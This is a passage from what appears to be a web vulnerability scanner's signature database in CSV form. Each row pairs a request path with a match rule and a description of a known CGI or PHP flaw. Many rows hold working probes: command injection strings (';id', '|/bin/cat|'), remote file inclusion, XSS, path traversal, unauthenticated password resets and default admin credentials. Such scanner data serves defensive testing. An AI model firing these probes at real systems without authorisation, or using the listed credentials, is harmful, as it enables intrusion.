commands.\",\"\",\"\"\n\"001046\",\"\",\"8\",\"@CGIDIRSlistrec.pl\",\"GET\",\"CODE:200\",\"This CGI allows attackers to execute commands on the host.\",\"\",\"\"\n\"001047\",\"\",\"8\",\"@CGIDIRSmailnews.cgi\",\"GET\",\"CODE:200\",\"Some versions allow attacker to execute commands as http daemon. Upgrade or remove.\",\"\",\"\"\n\"001048\",\"\",\"8\",\"@CGIDIRSmmstdod.cgi\",\"GET\",\"CODE:200\",\"May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.\",\"\",\"\"\n\"001049\",\"\",\"8\",\"@CGIDIRSpagelog.cgi\",\"GET\",\"CODE:200\",\"Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.\",\"\",\"\"\n\"001050\",\"\",\"8\",\"@CGIDIRSperl?-v\",\"GET\",\"CODE:200\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.\",\"\",\"\"\n\"001051\",\"\",\"8\",\"@CGIDIRSperl.exe?-v\",\"GET\",\"CODE:200\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.\",\"\",\"\"\n\"001052\",\"\",\"8\",\"@CGIDIRSperl.exe\",\"GET\",\"CODE:200\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.\",\"\",\"\"\n\"001053\",\"\",\"8\",\"@CGIDIRSperl\",\"GET\",\"CODE:200\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.\",\"\",\"\"\n\"001054\",\"\",\"8\",\"@CGIDIRSplusmail\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute commands remotely.\",\"\",\"\"\n\"001055\",\"CVE-2004-1607 http://www.securityfocus.com/archive/1/378637\",\"8\",\"@CGIDIRSscripts/slxweb.dll/getfile?type=Library&file=invalidfilename\",\"GET\",\"CODE:200\",\"SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.\",\"\",\"\"\n\"001056\",\"\",\"8\",\"@CGIDIRSsmartsearch.cgi?keywords=|/bin/cat%20/@LFI(nix,abs)|\",\"GET\",\"CODE:200&&@LFI()\",\"To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command\",\"\",\"\"\n\"001057\",\"\",\"8\",\"@CGIDIRSsmartsearch/smartsearch.cgi?keywords=|/bin/cat%20@LFI(nix,abs)|\",\"GET\",\"@LFI()\",\"To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command\",\"\",\"\"\n\"001058\",\"https://www.tenable.com/plugins/nessus/10393\",\"8\",\"@CGIDIRSspin_client.cgi?aaaaaaaa\",\"GET\",\"CODE:200\",\"This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)\",\"\",\"\"\n\"001059\",\"CVE-2002-0436\",\"8\",\"@CGIDIRSsscd_suncourier.pl\",\"GET\",\"CODE:200\",\"Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.\",\"\",\"\"\n\"001060\",\"CVE-2001-0849\",\"8\",\"@CGIDIRSviralator.cgi\",\"GET\",\"CODE:200\",\"May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.\",\"\",\"\"\n\"001061\",\"CVE-2002-1938\",\"8\",\"@CGIDIRSvirgil.cgi\",\"GET\",\"CODE:200\",\"The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax such as virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.\",\"\",\"\"\n\"001062\",\"https://seclists.org/bugtraq/2002/Oct/362\",\"8\",\"@CGIDIRSvpasswd.cgi\",\"GET\",\"CODE:200\",\"Some versions of this CGI allow attackers to execute system commands.\",\"\",\"\"\n\"001063\",\"CVE-1999-0176\",\"8\",\"@CGIDIRSwebgais\",\"GET\",\"CODE:200\",\"The webgais allows attackers to execute commands.\",\"\",\"\"\n\"001064\",\"CVE-1999-0196\",\"8\",\"@CGIDIRSwebsendmail\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute arbitrary commands remotely.\",\"\",\"\"\n\"001065\",\"\",\"8\",\"@CGIDIRSwhois.cgi?action=load&whois=%3Bid\",\"GET\",\"BODY:uid=\",\"This script allows commands to be executed remotely.\",\"\",\"\"\n\"001066\",\"\",\"8\",\"@CGIDIRSwwwwais\",\"GET\",\"CODE:200\",\"wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.\",\"\",\"\"\n\"001067\",\"CVE-2002-0436\",\"8\",\"/cd-cgi/sscd_suncourier.pl\",\"GET\",\"CODE:200\",\"Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.\",\"\",\"\"\n\"001068\",\"\",\"8\",\"@CGIDIRScommon/listrec.pl\",\"GET\",\"CODE:200\",\"This CGI allows attackers to execute commands on the host.\",\"\",\"\"\n\"001069\",\"\",\"8\",\"/cgi-bin/handler\",\"GET\",\"CODE:200\",\"This program allows remote users to run arbitrary commands.\",\"\",\"\"\n\"001070\",\"\",\"8\",\"/cgi-bin/handler/netsonar;cat%20@LFI(nix,abs)|?data=Download\",\"GET\",\"@LFI()\",\"This program allows remote users to run arbitrary commands.\",\"\",\"\"\n\"001071\",\"CVE-1999-0039\",\"8\",\"/cgi-bin/webdist.cgi\",\"GET\",\"CODE:200\",\"This program allows remote users to run arbitrary commands.\",\"\",\"\"\n\"001072\",\"CVE-2002-1484\",\"8\",\"/DB4Web/10.10.10.10:100\",\"GET\",\"BODY:connect\\(\\)\",\"The remote DB4Web server may allow you to connect to arbitrary machines and ports.\",\"\",\"\"\n\"001073\",\"CVE-1999-0279\",\"8\",\"/ews/ews/architext_query.pl\",\"GET\",\"CODE:200\",\"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"001074\",\"\",\"8\",\"/exec/show/config/cr\",\"GET\",\"BODY:http>Configure\",\"The Cisco router's web install allows arbitrary commands to be executed remotely.\",\"\",\"\"\n\"001075\",\"CVE-2002-0490\",\"8\",\"/instantwebmail/message.php\",\"GET\",\"CODE:200\",\"Instant Web Mail is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.\",\"\",\"\"\n\"001076\",\"\",\"38\",\"/cfdocs/snippets/gettempdirectory.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"Depending on install, creates files, gives you physical drive info, sometimes defaults to \\winnt\\ directory as temp directory\",\"\",\"\"\n\"001077\",\"CVE-2002-2330,http://www.uninetsolutions.com/stats.html\",\"48\",\"@CGIDIRSstat.pl\",\"GET\",\"CODE:200\",\"Uninets StatsPlus 1.25 may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.\",\"\",\"\"\n\"001078\",\"CVE-1999-0710\",\"a\",\"@CGIDIRScachemgr.cgi\",\"GET\",\"CODE:200\",\"Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.\",\"\",\"\"\n\"001079\",\"https://web.archive.org/web/20080724211140/https://www.securityfocus.com/bid/491/discuss\",\"a\",\"@CGIDIRSppdscgi.exe\",\"GET\",\"CODE:200\",\"Cognos PowerPlay Web Edition may allow unauthenticated users to view pages.\",\"\",\"\"\n\"001080\",\"\",\"ae\",\"@CGIDIRSsws/admin.html\",\"GET\",\"BODY:manager\\.pl\",\"Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication.\",\"\",\"\"\n\"001081\",\"\",\"ae\",\"@CGIDIRSwebif.cgi\",\"GET\",\"CODE:200\",\"HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.\",\"\",\"\"\n\"001082\",\"CVE-2006-5412\",\"ae\",\"/admin.php?en_log_id=0&action=config\",\"GET\",\"CODE:200\",\"EasyNews version 4.3 allows remote admin access. This PHP file should be protected.\",\"\",\"\"\n\"001083\",\"CVE-2006-5412\",\"ae\",\"/admin.php?en_log_id=0&action=users\",\"GET\",\"CODE:200\",\"EasyNews version 4.3 allows remote admin access. This PHP file should be protected.\",\"\",\"\"\n\"001084\",\"\",\"ae\",\"/admin.php4?reg_login=1\",\"GET\",\"CODE:200\",\"Mon Album version 0.6.2d allows remote admin access. This should be protected.\",\"\",\"\"\n\"001085\",\"\",\"ae\",\"/admin/admin_phpinfo.php4\",\"GET\",\"CODE:200\",\"Mon Album version 0.6.2d allows remote admin access. This should be protected.\",\"\",\"\"\n\"001086\",\"CVE-2002-0995\",\"a\",\"/admin/login.php?action=insert&username=test&password=test\",\"GET\",\"CODE:200\",\"phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.\",\"\",\"\"\n\"001087\",\"\",\"a\",\"@CGIDIRS.cobalt/siteUserMod/siteUserMod.cgi\",\"GET\",\"CODE:200\",\"Older versions of this CGI allow any user to change the administrator password.\",\"\",\"\"\n\"001088\",\"CVE-2001-0432\",\"a\",\"/interscan/cgi-bin/FtpSave.dll?I'm%20Here\",\"GET\",\"BODY:These settings have been saved\",\"Multiple files in the Interscan management server allow attackers to change settings without auth. Upgrade to the latest version of the Interscan product.\",\"\",\"\"\n\"001089\",\"CVE-2002-1021\",\"7a\",\"/ext.ini.%00.txt\",\"GET\",\"BODY:\\[SERVICES\\]\",\"BadBlue allows access restrictions to be bypassed by using a null byte.\",\"\",\"\"\n\"001090\",\"\",\"8a\",\"@CGIDIRSwebdriver\",\"GET\",\"CODE:200\",\"This CGI often allows anyone to access the Informix DB on the host.\",\"\",\"\"\n\"001091\",\"CVE-2002-0599,https://sourceforge.net/projects/blahzdns/\",\"8a\",\"/dostuff.php?action=modify_user\",\"GET\",\"CODE:200\",\"Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher.\",\"\",\"\"\n\"001092\",\"\",\"ab\",\"@CGIDIRSc32web.exe/ChangeAdminPassword\",\"GET\",\"CODE:200\",\"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.\",\"\",\"\"\n\"001093\",\"CVE-2002-0776\",\"ab\",\"/accounts/getuserdesc.asp\",\"GET\",\"CODE:200\",\"Hosting Controller 2002 administration page is available. This should be protected.\",\"\",\"\"\n\"001094\",\"\",\"b\",\"@CGIDIRScgi-lib.pl\",\"GET\",\"CODE:200\",\"CGI Library. If retrieved check to see if it is outdated, it may have vulns\",\"\",\"\"\n\"001095\",\"\",\"b\",\"@CGIDIRSlog/nether-log.pl?checkit\",\"GET\",\"CODE:200\",\"Default Pass: nethernet-rules\",\"\",\"\"\n\"001096\",\"\",\"b\",\"@CGIDIRSmini_logger.cgi\",\"GET\",\"CODE:200\",\"Default password: guest\",\"\",\"\"\n\"001097\",\"\",\"b\",\"@CGIDIRSmt-static/\",\"GET\",\"CODE:200\",\"Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.\",\"\",\"\"\n\"001098\",\"\",\"b\",\"@CGIDIRSmt/\",\"GET\",\"CODE:200\",\"Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.\",\"\",\"\"\n\"001099\",\"\",\"b\",\"@CGIDIRSnimages.php\",\"GET\",\"CODE:200\",\"Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.\",\"\",\"\"\n\"001100\",\"\",\"b\",\"@CGIDIRSrobadmin.cgi\",\"GET\",\"CODE:200\",\"Default password: roblog\",\"\",\"\"\n\"001101\",\"\",\"b\",\"/Admin/\",\"GET\",\"BODY:CobaltServer\",\"The web server is the CobaltRaq administrator. If password protection is broken, attackers will have access to admin your server. Use tcpwrappers or shut this down for safety.\",\"\",\"\"\n\"001102\",\"\",\"0b\",\"@CGIDIRSnetpad.cgi\",\"GET\",\"CODE:200\",\"netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.\",\"\",\"\"\n\"001103\",\"\",\"1b\",\"@CGIDIRStroops.cgi\",\"GET\",\"CODE:200\",\"This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further.\",\"\",\"\"\n\"001104\",\"\",\"1b\",\"@CGIDIRSunlg1.1\",\"GET\",\"CODE:200\",\"web backdoor by ULG\",\"\",\"\"\n\"001105\",\"\",\"1b\",\"@CGIDIRSunlg1.2\",\"GET\",\"CODE:200\",\"web backdoor by ULG\",\"\",\"\"\n\"001106\",\"\",\"8b\",\"@CGIDIRSrwwwshell.pl\",\"GET\",\"CODE:200\",\"THC reverse www shell\",\"\",\"\"\n\"001107\",\"\",\"ab\",\"@CGIDIRSphoto/manage.cgi\",\"GET\",\"CODE:200\",\"My Photo Gallery management interface. May allow full access to photo galleries and more.\",\"\",\"\"\n\"001109\",\"CVE-2002-1435\",\"c\",\"/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Achievo can be made to include PHP files from another domain. Upgrade to a new version.\",\"\",\"\"\n\"001110\",\"CVE‑2002‑2305\",\"9\",\"/agentadmin.php?agentname='\",\"GET\",\"CODE:200&&BODY:(?i)sql\",\"Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.\",\"\",\"\"\n\"001111\",\"CVE-2002-0734\",\"c\",\"/b2-include/b2edit.showposts.php?b2inc=@RFIURL&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote PHP file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed.\",\"\",\"\"\n\"001113\",\"https://seclists.org/fulldisclosure/2002/Aug/42\",\"c\",\"/errors/needinit.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version.\",\"\",\"\"\n\"001114\",\"\",\"13\",\"/sqldump.sql\",\"GET\",\"CODE:200\",\"Database SQL?\",\"\",\"\"\n\"001115\",\"\",\"13\",\"/structure.sql\",\"GET\",\"CODE:200\",\"Database SQL?\",\"\",\"\"\n\"001116\",\"\",\"2\",\"/servlet/SessionManager\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.\",\"\",\"\"\n\"001117\",\"\",\"23\",\"/php.ini\",\"GET\",\"BODY:\\[PHP\\]\",\"This file should not be available through the web interface.\",\"\",\"\"\n\"001118\",\"\",\"2a\",\"/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator\",\"GET\",\"BODY:Event Log\",\"SiteScope service has no password set. Restrict by IP and set a password.\",\"\",\"\"\n\"001119\",\"\",\"3\",\"/ip.txt\",\"GET\",\"CODE:200\",\"This may be User Online version 2.0, which has a remotely accessible log file.\",\"\",\"\"\n\"001120\",\"https://www.adobe.com/products/coldfusion-family.html\",\"3\",\"/@JUNK(6).cfm?mode=debug\",\"GET\",\"BODY:Execution Time\",\"ColdFusion debug information contains sensitive information and can be viewed by appending ?Mode=debug at the end of the request.\",\"\",\"\"\n\"001121\",\"\",\"3\",\"/level/42/exec/show%20conf\",\"GET\",\"CODE:200\",\"Retrieved Cisco configuration file.\",\"\",\"\"\n\"001122\",\"\",\"3\",\"/livehelp/\",\"GET\",\"CODE:200\",\"LiveHelp may reveal system information.\",\"\",\"\"\n\"001123\",\"\",\"3\",\"/LiveHelp/\",\"GET\",\"CODE:200\",\"LiveHelp may reveal system information.\",\"\",\"\"\n\"001124\",\"CVE-2003-1383\",\"3\",\"/logicworks.ini\",\"GET\",\"CODE:200\",\"web-erp 0.1.4 and earlier allow .ini files to be read remotely.\",\"\",\"\"\n\"001125\",\"\",\"3\",\"/login.jsp\",\"GET\",\"BODY:replace\\(\\\"https:\\\\\\/\\\\\\/10\",\"HP Insight Manager reveals internal IP addresses in the HTML page.\",\"\",\"\"\n\"001126\",\"\",\"3\",\"/logins.html\",\"GET\",\"BODY:Below are the usernames and passwords\",\"The Divine/OpenMarket Content Server lists the default user names and passwords set up with the server.\",\"\",\"\"\n\"001127\",\"\",\"3\",\"/logs/str_err.log\",\"GET\",\"CODE:200\",\"Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).\",\"\",\"\"\n\"001128\",\"CVE-1999-0606\",\"3\",\"/mall_log_files/order.log\",\"GET\",\"CODE:200\",\"EZMall2000 exposes order information.\",\"\",\"\"\n\"001129\",\"https://www.php.net/manual/en/function.phpinfo.php\",\"3\",\"/mambo/administrator/phpinfo.php\",\"GET\",\"BODY:PHP Version\",\"Mambo Site Server 4.0.11 phpinfo.php script reveals system information.\",\"\",\"\"\n\"001130\",\"https://seclists.org/fulldisclosure/2003/Jun/886\",\"3\",\"/megabook/files/20/setup.db\",\"GET\",\"CODE:200\",\"Megabook guestbook configuration available remotely.\",\"\",\"\"\n\"001132\",\"\",\"3\",\"/modules.php?name=Members_List&sql_debug=1\",\"GET\",\"BODY:SQL query:\",\"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.\",\"\",\"\"\n\"001133\",\"\",\"3\",\"/myinvoicer/config.inc\",\"GET\",\"BODY:System settings\",\"MyInvoicer prior to 1.0.2 allowed remote user to read source of config file, possibly leaking sensitive information or passwords.\",\"\",\"\"\n\"001134\",\"CVE-2001-1151\",\"3\",\"/officescan/hotdownload/ofscan.ini\",\"GET\",\"CODE:200\",\"OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.\",\"\",\"\"\n\"001136\",\"CVE-1999-0606\",\"3\",\"/order/order_log.dat\",\"GET\",\"CODE:200\",\"Web shopping system exposes order information.\",\"\",\"\"\n\"001137\",\"CVE-1999-0606\",\"3\",\"/orders/order_log_v12.dat\",\"GET\",\"CODE:200\",\"Web shopping system exposes order information.\",\"\",\"\"\n\"001141\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/PDG_Cart/shopper.conf\",\"GET\",\"BODY:Authnet_Login\",\"PDGSoft's PDG Shopping Cart 1.5 config is available.\",\"\",\"\"\n\"001142\",\"CVE-2002-0352\",\"3\",\"/phorum/admin/stats.php\",\"GET\",\"BODY:Phorum Stats\",\"PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it.\",\"\",\"\"\n\"001143\",\"https://www.exploit-db.com/exploits/23372\",\"3\",\"/php-coolfile/action.php?action=edit&file=config.php\",\"GET\",\"BODY:pass_1\",\"PHP-Coolfile 1.4 may allow any user to read the config.php file.\",\"\",\"\"\n\"001144\",\"https://www.php.net/manual/en/function.phpinfo.php\",\"3\",\"/phpBB/phpinfo.php\",\"GET\",\"BODY:PHP Version\",\"phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information.\",\"\",\"\"\n\"001147\",\"https://seclists.org/bugtraq/2002/Dec/129\",\"3\",\"/pmlite.php\",\"GET\",\"CODE:200\",\"A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested).\",\"\",\"\"\n\"001148\",\"\",\"3\",\"/session/admnlogin\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"SessionServlet Output, has session cookie info.\",\"\",\"\"\n\"001149\",\"https://seclists.org/bugtraq/2003/Apr/208\",\"3\",\"/settings/site.ini\",\"GET\",\"BODY:DatabaseSettings\",\"eZ publish v3 and prior allow site setup code to be viewed remotely.\",\"\",\"\"\n\"001150\",\"https://web.archive.org/web/20200229143457/https://www.securityfocus.com/bid/49345/discuss\",\"3\",\"/SiteScope/htdocs/SiteScope.html\",\"GET\",\"CODE:200\",\"The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.\",\"\",\"\"\n\"001151\",\"\",\"3\",\"/soapdocs/ReleaseNotes.html\",\"GET\",\"BODY:Oracle SOAP\",\"Default Oracle SOAP documentation found.\",\"\",\"\"\n\"001152\",\"\",\"3\",\"/ssdefs/siteseed.dtd\",\"GET\",\"BODY:imagesDir=\\\"\",\"Siteseed pre 1.4.2 has 'major' security problems, and this dtd file reveals the web root.\",\"\",\"\"\n\"001153\",\"CVE-2001-0926\",\"35\",\"/servlet/allaire.jrun.ssi.SSIFilter\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.\",\"<!--#include virtual=\\\"/index.jsp\\\"-->\",\"\"\n\"001155\",\"\",\"6\",\"/isapi/count.pl?\",\"GET\",\"CODE:200\",\"AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.\",\"\",\"\"\n\"001156\",\"\",\"7\",\"/krysalis/\",\"GET\",\"CODE:200\",\"Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot\",\"\",\"\"\n\"001157\",\"\",\"8\",\"/logjam/showhits.php\",\"GET\",\"CODE:200\",\"Logjam may possibly allow remote command execution via showhits.php page.\",\"\",\"\"\n\"001158\",\"\",\"8\",\"/manual.php\",\"GET\",\"CODE:200\",\"Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.\",\"\",\"\"\n\"001159\",\"CVE-2005-1628\",\"8\",\"/mods/apage/apage.cgi?f=file.htm.|id|\",\"GET\",\"BODY:uid=0\",\"WebAPP Apage.CGI remote command execution.\",\"\",\"\"\n\"001160\",\"\",\"8\",\"/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"BODY:uid=\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001161\",\"\",\"8\",\"/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"BODY:uid=\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001162\",\"\",\"8\",\"/perl/-e%20%22system('cat%20@LFI(nix,abs)');\\%22\",\"GET\",\"@LFI()\",\"The installed Perl interpreter allows any command to be executed remotely.\",\"\",\"\"\n\"001163\",\"\",\"8\",\"/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"BODY:uid=\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001164\",\"\",\"8\",\"/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"BODY:uid=\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001165\",\"CVE-2005-0595\",\"8\",\"/Program%20Files/\",\"GET\",\"BODY:WindowsUpdate\",\"This check (B) uses the BadBlue test (A) for possible exploit.\",\"\",\"\"\n\"001166\",\"CVE-2002-0220\",\"8\",\"/smssend.php\",\"GET\",\"CODE:200\",\"PhpSmssend may allow system calls if a ' is passed to it.\",\"\",\"\"\n\"001167\",\"\",\"8a\",\"/pls/simpledad/admin_/dadentries.htm\",\"GET\",\"BODY:Add Database Access\",\"Oracle admin script allows modification of database information.\",\"\",\"\"\n\"001168\",\"\",\"a\",\"/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000\",\"POST\",\"BODY:Login as Admin successful\",\"Meridian Integrated Recorded Announcer default account admin/admin000 enabled\",\"\",\"\"\n\"001169\",\"CVE-1999-1508\",\"a\",\"/ncl_items.html\",\"GET\",\"CODE:200\",\"This may allow attackers to reconfigure your Tektronix printer.\",\"\",\"\"\n\"001170\",\"CVE-2001-0484\",\"a\",\"/ncl_items.shtml?SUBJECT=1\",\"GET\",\"CODE:200\",\"This may allow attackers to reconfigure your Tektronix printer.\",\"\",\"\"\n\"001171\",\"\",\"a\",\"/photo/manage.cgi\",\"GET\",\"CODE:200\",\"My Photo Gallery management interface. May allow full access to photo galleries and more.\",\"\",\"\"\n\"001172\",\"\",\"a\",\"/photodata/manage.cgi\",\"GET\",\"CODE:200\",\"My Photo Gallery management interface. May allow full access to photo galleries and more.\",\"\",\"\"\n\"001174\",\"CVE-2002-0095\",\"a\",\"/pub/english.cgi?op=rmail\",\"GET\",\"CODE:200\",\"BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.\",\"\",\"\"\n\"001175\",\"\",\"a\",\"/pvote/ch_info.php?newpass=password&confirm=password%20\",\"GET\",\"CODE:200\",\"PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.\",\"\",\"\"\n\"001176\",\"CVE-2000-0127\",\"a\",\"/scripts/wsisa.dll/WService=anything?WSMadmin\",\"GET\",\"CODE:200\",\"Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.\",\"\",\"\"\n\"001177\",\"\",\"a\",\"/SetSecurity.shm\",\"GET\",\"CODE:200\",\"Cisco System's My Access for Wireless. This resource should be password protected.\",\"\",\"\"\n\"001179\",\"https://www.exploit-db.com/exploits/22845\",\"a\",\"/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin\",\"GET\",\"CODE:200\",\"paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.\",\"\",\"\"\n\"001180\",\"CVE-1999-0508\",\"ab\",\"/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&\",\"GET\",\"BODY:server\\.javawebserver\\.serviceAdmin\",\"The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.\",\"\",\"\"\n\"001181\",\"\",\"b\",\"/shopadmin.asp\",\"GET\",\"CODE:200\",\"VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.\",\"\",\"\"\n\"001182\",\"CVE-2002-1135\",\"c\",\"/modsecurity.php?inc_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/\",\"\",\"\"\n\"001183\",\"CVE-2002-0473\",\"c\",\"/phpBB2/includes/db.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.\",\"\",\"\"\n\"001184\",\"CVE-2002-0681\",\"4\",\"/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001185\",\"CVE-2000-0413\",\"3\",\"/_vti_bin/shtml.exe/@JUNK(5)_nonexistant.exe\",\"GET\",\"BODY::\\\\\\\\&&!BODY:Unknown CONTENT_TYPE\",\"This exe shows the full web path when a non-existent file is requested.\",\"\",\"\"\n\"001186\",\"\",\"1b\",\"/_vti_txt/_vti_cnf/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"001187\",\"\",\"1b\",\"/_vti_txt/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"001188\",\"\",\"23\",\"/_vti_pvt/deptodoc.btr\",\"GET\",\"CODE:200\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001189\",\"\",\"23\",\"/_vti_pvt/doctodep.btr\",\"GET\",\"CODE:200\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001190\",\"\",\"23\",\"/_vti_pvt/services.org\",\"GET\",\"CODE:200\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001191\",\"CVE-2000-0413,CVE-2000-0709,CVE-2000-0710\",\"3\",\"/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611\",\"POST\",\"CODE:200&&!BODY:FrontPage Error\",\"Gives info about server settings.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001192\",\"CVE-2000-0413,CVE-2000-0709,CVE-2000-0710\",\"3\",\"/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611\",\"POST\",\"CODE:200&&!BODY:Unknown CONTENT_TYPE\",\"Gives info about server settings.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001193\",\"\",\"a\",\"/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false\",\"POST\",\"CODE:200&&!BODY:specified module could not be found\",\"We seem to have authoring access to the FrontPage web.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001194\",\"\",\"a\",\"/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false\",\"POST\",\"CODE:200&&!BODY:specified module could not be found\",\"We seem to have authoring access to the FrontPage web.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001195\",\"MS00-025\",\"ad\",\"/_vti_bin/_vti_aut/dvwssr.dll\",\"GET\",\"CODE:200\",\"This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated 